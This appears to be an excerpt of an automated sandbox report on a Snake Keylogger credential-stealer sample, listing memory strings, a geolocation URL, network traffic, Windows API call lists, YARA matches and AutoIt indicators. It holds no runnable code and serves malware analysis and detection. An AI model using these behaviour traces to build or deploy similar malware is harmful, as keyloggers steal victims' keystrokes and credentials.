Source: RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: supergroup.exe, 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, supergroup.exe, 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.1730351913.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B14164

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00B14164
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00234164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00234164

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B13F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B13F66

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B0001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B0001C

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B2CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00B2CABC
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0024CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_0024CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: supergroup.exe PID: 7744, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: supergroup.exe PID: 7744, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: supergroup.exe PID: 8100, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: supergroup.exe PID: 8100, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00AA3B3A
Source: MBOaS3GRtF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: MBOaS3GRtF.exe, 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e0e100ea-c
Source: MBOaS3GRtF.exe, 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_2f791c45-f
Source: MBOaS3GRtF.exe, 00000000.00000003.1353576663.0000000003F03000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ff376649-7
Source: MBOaS3GRtF.exe, 00000000.00000003.1353576663.0000000003F03000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_280f2274-7
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: This is a third-party compiled AutoIt script.	2_2_001C3B3A
Source: supergroup.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: supergroup.exe, 00000002.00000002.1396158023.0000000000274000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a3cd6b9e-1
Source: supergroup.exe, 00000002.00000002.1396158023.0000000000274000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_d9344e37-a
Source: supergroup.exe, 00000006.00000002.1564728523.0000000000274000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_92ed84ba-7
Source: supergroup.exe, 00000006.00000002.1564728523.0000000000274000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_3b75e2e7-2
Source: MBOaS3GRtF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0541fb69-0
Source: MBOaS3GRtF.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_6ebd5f87-5
Source: supergroup.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_304b7ed6-6
Source: supergroup.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_8d11c29f-9

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B0A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00B0A1EF

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AF8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00AF8310

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00B051BD
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_002251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_002251BD

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AAE6A0	0_2_00AAE6A0
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00ACD975	0_2_00ACD975
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AAFCE0	0_2_00AAFCE0
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC21C5	0_2_00AC21C5
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AD62D2	0_2_00AD62D2
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B203DA	0_2_00B203DA
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AD242E	0_2_00AD242E
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC25FA	0_2_00AC25FA
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AB66E1	0_2_00AB66E1
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AFE616	0_2_00AFE616
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AD878F	0_2_00AD878F
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B08889	0_2_00B08889
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AB8808	0_2_00AB8808
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B20857	0_2_00B20857
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AD6844	0_2_00AD6844
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00ACCB21	0_2_00ACCB21
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AD6DB6	0_2_00AD6DB6
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AB6F9E	0_2_00AB6F9E
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AB3030	0_2_00AB3030
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC3187	0_2_00AC3187
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00ACF1D9	0_2_00ACF1D9
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AA1287	0_2_00AA1287
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC1484	0_2_00AC1484
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AB5520	0_2_00AB5520
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC7696	0_2_00AC7696
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AB5760	0_2_00AB5760
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC1978	0_2_00AC1978
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AD9AB5	0_2_00AD9AB5
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00ACBDA6	0_2_00ACBDA6
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AC1D90	0_2_00AC1D90
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B27DDB	0_2_00B27DDB
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AB3FE0	0_2_00AB3FE0
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00AADF00	0_2_00AADF00
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_014E8AE0	0_2_014E8AE0
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001CE6A0	2_2_001CE6A0
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001ED975	2_2_001ED975
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001CFCE0	2_2_001CFCE0
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E21C5	2_2_001E21C5
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001F62D2	2_2_001F62D2
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_002403DA	2_2_002403DA
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001F242E	2_2_001F242E
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E25FA	2_2_001E25FA
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0021E616	2_2_0021E616
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001D66E1	2_2_001D66E1
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001F878F	2_2_001F878F
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001D8808	2_2_001D8808
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001F6844	2_2_001F6844
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00240857	2_2_00240857
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00228889	2_2_00228889
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001ECB21	2_2_001ECB21
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001F6DB6	2_2_001F6DB6
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001D6F9E	2_2_001D6F9E
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001D3030	2_2_001D3030
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E3187	2_2_001E3187
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001EF1D9	2_2_001EF1D9
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001C1287	2_2_001C1287
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E1484	2_2_001E1484
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001D5520	2_2_001D5520
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E7696	2_2_001E7696
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001D5760	2_2_001D5760
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E1978	2_2_001E1978
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001F9AB5	2_2_001F9AB5
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001E1D90	2_2_001E1D90
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001EBDA6	2_2_001EBDA6
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00247DDB	2_2_00247DDB
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001CDF00	2_2_001CDF00
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001D3FE0	2_2_001D3FE0
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00D99938	2_2_00D99938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_024C6118	3_2_024C6118
